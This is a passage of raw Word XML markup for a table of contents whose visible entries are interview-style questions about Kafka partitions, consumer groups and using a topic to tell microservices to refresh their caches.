              <w:t>1148</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4B9904BC" w14:textId="34FE702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7868059 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1150</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="48577FFB" w14:textId="2FB322E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7868060 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1152</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5FD5984C" w14:textId="1EC82C7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7868061 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1153</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="20408CD4" w14:textId="5BC7400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7868062 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1155</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="67676619" w14:textId="1657735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7868063 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1158</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="04C4B90F" w14:textId="0A75598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7868064 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1161</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="09FC1E1D" w14:textId="6F8697B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7868065 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1163</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="281BF1B7" w14:textId="695CF38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7868066 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1165</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5314AF47" w14:textId="7364AFE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7868067 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1166</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5B9520AA" w14:textId="7A09FF2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7868068 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1168</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="03130CDA" w14:textId="1A88417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7868069 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1170</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0CE0BAAD" w14:textId="6B27CE4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7868070 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1171</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="24662A29" w14:textId="7FACFF9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7868071 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1174</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7E6C30E9" w14:textId="695C793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7868072 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1176</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="179D5D49" w14:textId="5D37978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7868073 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1178</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0B107458" w14:textId="4B7B047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7868074 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1179</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="114BF7A3" w14:textId="40DCDED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7868075 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1181</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2A67ED60" w14:textId="3D40880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7868076 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1183</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="700A4873" w14:textId="321CE5C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7868077 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1185</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="558A560B" w14:textId="3B3EFC8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7868078 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1187</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3713BDFC" w14:textId="02AED8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7868079 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1189</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0B6C4C29" w14:textId="3972B7E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7868080 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1191</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="54B26BAD" w14:textId="305FCB6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7868081 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1193</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5BD9C12F" w14:textId="5F689AF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7868082 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1195</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4BD51325" w14:textId="5301E42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7868083 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1197</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="484C61EF" w14:textId="7BA8685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7868084 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1199</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3555F274" w14:textId="3803716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7868085 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1202</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3D4323CF" w14:textId="7B7F11B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7868086 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1203</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="53C1839B" w14:textId="5F1E0DE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7868087 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1205</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="41E2AF1E" w14:textId="71EAEDC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7868088 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1206</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3064FBA0" w14:textId="2051DB1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7868089 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1206</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2D15E7EB" w14:textId="1201DEE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7868090 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1207</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3C6EDE17" w14:textId="1ED0D58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7868091 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1208</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="044AE948" w14:textId="2E48786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7868092 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1209</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="48E4293A" w14:textId="7092B16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7868093 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1211</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="740E6724" w14:textId="008D028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we decide the number of partitions, I have a microservice which is dealing with lots of data, so how will you decide x number of partitions for a Kafka topic?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197868094 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1212</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6797BE72" w14:textId="531F834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Let's say you have topic with 10 partitions and you are getting data from all 10 partitions and your microservice will reading line by line even though data is present at 10 partitions and it will read through 1 partition at a time, so how will you handle this?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197868095 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1212</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="43720AAF" w14:textId="6368F6E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you have 1 consumer which is listening to 1 topic which is having 1 partition through this 1 message when consumer is reading that message and in the same consumer group there is one more consumer groups so will it be able to read the same message?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197868096 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1213</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0910AB4D" w14:textId="07A9B0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 have one use case, let's say we have 1 notification microservice and we have 5 different microservices and there are internally having caching system so whenever this notification service will restart during that it will send a message to particular topic saying that all the 5 microservices please refresh your cache, so how all 5 microservices can listen to the message and is it a valid use case?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197868097 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1214</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5F8866A3" w14:textId="71B0C75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Let's say we have 5 microservices so can we multiple consumer group in different consumer Groups? Group id will be different or same?</w:t>
